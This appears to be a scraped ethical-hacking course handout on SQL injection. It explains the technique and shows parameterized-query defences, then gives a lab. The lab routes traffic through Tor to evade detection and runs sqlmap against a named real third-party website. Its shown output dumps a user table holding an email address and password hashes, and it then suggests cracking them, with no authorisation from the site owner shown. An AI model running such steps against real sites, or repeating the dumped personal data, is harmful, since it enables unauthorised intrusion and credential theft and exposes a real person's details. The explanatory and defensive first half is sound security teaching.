11 - SQL Injection Attack - Requires Internet

NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
SQL injection Attack
▪ SQL injection is a code injection technique that might destroy your database.
▪ SQL injection is one of the most common web hacking techniques.
▪ SQL injection is the placement of malicious code in SQL statements, via web page input.
SQL in Web Pages

SQL injection usually occurs when you ask a user for input, like their username/userid, and instead of a name/id,
the user gives you an SQL statement that you will unknowingly run on your database.
Look at the following example which creates a SELECT statement by adding a variable (txtUserId) to a select string.
The variable is fetched from user input (getRequestString):
SQL Injection Based on 1=1 is Always True

Look at the example above again. The original purpose of the code was to create an SQL statement to select a user,
with a given user id.
If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this:
UserId:
105 OR 1=1
Then, the SQL statement will look like this:
SELECT * FROM Users WHERE UserId = 105 OR 1=1;

The SQL above is valid and will return ALL rows from the "Users" table, since OR 1=1 is always TRUE.
Does the example above look dangerous? What if the "Users" table contains names and passwords?
The SQL statement above is much the same as this:
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1;
A hacker might get access to all the user names and passwords in a database, by simply inserting 105 OR 1=1 into
the input field.
SQL Injection Based on ""="" is Always True

Here is an example of a user login on a web site:
Username:
John Doe
Password:
myPass
Example
uName = getRequestString("username");
1
uPass = getRequestString("userpassword");
sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"'
Result
SELECT * FROM Users WHERE Name ="John Doe" AND Pass ="myPass"
A hacker might get access to user names and passwords in a database by simply inserting " OR ""=" into the user
name or password text box:
User Name:
" or ""="
Password:
" or ""="
The code at the server will create a valid SQL statement like this:
Result
SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
The SQL above is valid and will return all rows from the "Users" table, since OR ""="" is always TRUE.
SQL Injection Based on Batched SQL Statements

Most databases support batched SQL statement.
A batch of SQL statements is a group of two or more SQL statements, separated by semicolons.
The SQL statement below will return all rows from the "Users" table, then delete the "Suppliers" table.
Example
SELECT * FROM Users; DROP TABLE Suppliers
Look at the following example:
Example
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
And the following input:
User id:
105; DROP TABLE Suppliers
The valid SQL statement would look like this:
Result
SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers;
Use SQL Parameters for Protection
To protect a web site from SQL injection, you can use SQL parameters.
SQL parameters are values that are added to an SQL query at execution time, in a controlled manner.
ASP.NET Razor Example

2
txtSQL = "SELECT * FROM Users WHERE UserId = @0";

db.Execute(txtSQL,txtUserId);
Note that parameters are represented in the SQL statement by a @ marker.
The SQL engine checks each parameter to ensure that it is correct for its column and are treated literally, and not
as part of the SQL to be executed.
Another Example
txtNam = getRequestString("CustomerName");
txtAdd = getRequestString("Address");
txtCit = getRequestString("City");
txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";
db.Execute(txtSQL,txtNam,txtAdd,txtCit);
Examples
The following examples shows how to build parameterized queries in some common web languages.
SELECT STATEMENT IN ASP.NET:
sql = "SELECT * FROM Customers WHERE CustomerId = @0";
command = new SqlCommand(sql);
command.Parameters.AddWithValue("@0",txtUserID);
command.ExecuteReader();
INSERT INTO STATEMENT IN ASP.NET:
txtNam = getRequestString("CustomerName");
txtAdd = getRequestString("Address");
txtCit = getRequestString("City");
txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";
command = new SqlCommand(txtSQL);
command.Parameters.AddWithValue("@0",txtNam);
command.Parameters.AddWithValue("@1",txtAdd);
command.Parameters.AddWithValue("@2",txtCit);
command.ExecuteNonQuery();
INSERT INTO STATEMENT IN PHP:
$stmt = $dbh->prepare("INSERT INTO Customers (CustomerName,Address,City)

VALUES (:nam, :add, :cit)");
$stmt->bindParam(':nam', $txtNam);
$stmt->bindParam(':add', $txtAdd);
$stmt->bindParam(':cit', $txtCit);
$stmt->execute();
3
As a responsible ethical hacker, security engineer or penetration tester you should be familiar with the tools to
perform a penetration testing
HANDS-ON LAB:
Lab Objectives:
Lab Duration:
▪ Time: 45 minutes
Lab Environment
▪ You need internet connection
Lab Tasks
▪ To inject SQL statement for penetration testing
Tools
sqlmap
Step-by-Steps Instructions
Before doing an SQL injection attack and you must configure your network connection to use the free routing service
from TOR so they will not detect your physical location from the internet and also enable SSH for backdoor
connections
Step 1. Disable the default key and generate a new ssh key set
open a new kali terminal and type
cd /etc/ssh
mkdir keys_backup_ssh
mv ssh_host_* keys_backup_ssh
dpkg-reconfigure openssh-server
Step 2. start the ssh

service ssh start
Step 3. Verify if ssh is running

netstat -antp
Step 4. Stop the ssh

service ssh stop
4
Running TOR
We have to be anonymous on the internet using TOR which provides free access to free router so I already installed
TOR
Step 1. Update the number of proxy that our kali will use to the tor network bye disabling the strict chain & enable
the dynamic chain so type the following command
Type leafpad /etc/proxychains.conf
Step 2. look for Strict_chain and add the hashtag to disable
#Strict_chain
Step 3. Enable the dynamic_chain by removing the hashtag
dynamic_chain
Step 4. Add socks 5. Go to the end of the file and add an entry
socks5 127.0.0.1 9050
Step 5. now save and quit
Step 6. Start the TOR service
service tor start
Step 7. Verify if it is running
service tor status
press CTRL-C to break
Step 8. Test if tor is providing anonymous server by typing
firefox www.whatismyip.com ;this will identify your current location or that you are in Philippines
close the firefox and now type proxychains firefox www.whatismyip.com
Answer the captcha and click verify. Copy the code and enter in the box
you should now be in another country if that doesn’t work try www.cmyip.com in firefox
5
Penetration testing using SQL Injection
Step 1. We need to find a test site which is vulnerable for SQL injection
Open firefox and type php?id=1
Step 2. To list all the database from this company, open a new terminal and type
sqlmap -u http://edmazur.com/game/item.php?id=15 --dbs
back-end DBMS: MySQL >= 5.0

[09:29:11] [INFO] fetching database names
[09:29:11] [INFO] used SQL query returns 2 entries
[09:29:11] [INFO] resumed: 'information_schema'
[09:29:11] [INFO] resumed: 'em_main'
available databases [2]:
[*] em_main
[*] information_schema
Step 3. To list all the tables from the em_main database,
type sqlmap -u http://edmazur.com/game/item.php?id=15 -D em_main --tables
Database: em_main
[138 tables]
+------------------------------+
| bots_activity |
| bots_armors |
| jordan_CustomFieldMap |
| jordan_DataItem |
| jordan_Derivative |
| jordan_DerivativeImage |
| jordan_DerivativePrefsMap |
| jordan_DescendentCountsMap |
| jordan_Entity |
.
.
.
| jordan_SessionMap |
| jordan_ThumbnailImage |
| jordan_UnknownItem |
| jordan_User |
| jordan_UserGroupMap |
| jordan_WatermarkImage |
| jordan_WebDavLockMap |
| zbots_wiki_hitcounter |
| zbots_wiki_text |
+------------------------------+
6
Step 4. To list the columns available from the table jordan_user, type
sqlmap -u http://edmazur.com/game/item.php?id=15 -T jordan_User --columns
Database: em_main
Table: jordan_User
[7 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| g_email | varchar(255) |
| g_fullName | varchar(128) |
| g_hashedPassword | varchar(128) |
| g_id | int(11) |
| g_language | varchar(128) |
| g_locked | int(1) |
| g_userName | varchar(32) |
+------------------+--------------+
Step 5. To dump the users email, fullname, password & username, type
sqlmap -u http://edmazur.com/game/item.php?id=15 -T jordan_User -C
g_email,g_fullName,g_hashedPassword,g_userName --dump
Database: em_main
Table: jordan_User
[2 entries]
+----------------------------+-----------------------+--------------------------------------+------------+
| g_email | g_fullName | g_hashedPassword | g_userName |
+----------------------------+-----------------------+--------------------------------------+------------+
| NULL | Guest | Oq]C664b3c59e82f20ff2151259896244310 | guest |
| jdrobins@student.umass.edu | Gallery Administrator | dcl`bae71e101be8af16bd141c60d3e25e3a | jordan |
+----------------------------+-----------------------+--------------------------------------+------------+
Step 6. To crack the password of the user use ophcrack or Ncrack discuessed in the previous lessons or future lessons
now you have to disconnect the session by rebooting your PC.
Result of penetration testing: by now you should know how attacker perform SQL injection to gather the
username and password from the database
Question: As a Nexus Ethical Hacker what should you do to protect your company from SQL injection?

11 - SQL Injection Attack - Requires Internet

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

11 - SQL Injection Attack - Requires Internet

Uploaded by

Copyright:

Available Formats

NEXUS EDUCATION SERVICES

SQL injection Attack

▪ SQL injection is one of the most common web hacking techniques.

SQL in Web Pages

SQL Injection Based on 1=1 is Always True

Then, the SQL statement will look like this:

SELECT * FROM Users WHERE UserId = 105 OR 1=1;

The SQL statement above is much the same as this:

SQL Injection Based on ""="" is Always True

SQL Injection Based on Batched SQL Statements

The valid SQL statement would look like this:

ASP.NET Razor Example

txtSQL = "SELECT * FROM Users WHERE UserId = @0";

SELECT STATEMENT IN ASP.NET:

$stmt = $dbh->prepare("INSERT INTO Customers (CustomerName,Address,City)

open a new kali terminal and type

Step 2. start the ssh

Step 3. Verify if ssh is running

Step 4. Stop the ssh

Type leafpad /etc/proxychains.conf

Step 2. look for Strict_chain and add the hashtag to disable

Step 3. Enable the dynamic_chain by removing the hashtag

socks5 127.0.0.1 9050

Step 5. now save and quit

Step 6. Start the TOR service

service tor start

Step 7. Verify if it is running

service tor status

press CTRL-C to break

Step 8. Test if tor is providing anonymous server by typing

close the firefox and now type proxychains firefox www.whatismyip.com

Penetration testing using SQL Injection

Open firefox and type php?id=1

sqlmap -u http://edmazur.com/game/item.php?id=15 --dbs

back-end DBMS: MySQL >= 5.0

Step 3. To list all the tables from the em_main database,

type sqlmap -u http://edmazur.com/game/item.php?id=15 -D em_main --tables

sqlmap -u http://edmazur.com/game/item.php?id=15 -T jordan_User --columns

sqlmap -u http://edmazur.com/game/item.php?id=15 -T jordan_User -C

now you have to disconnect the session by rebooting your PC.

You might also like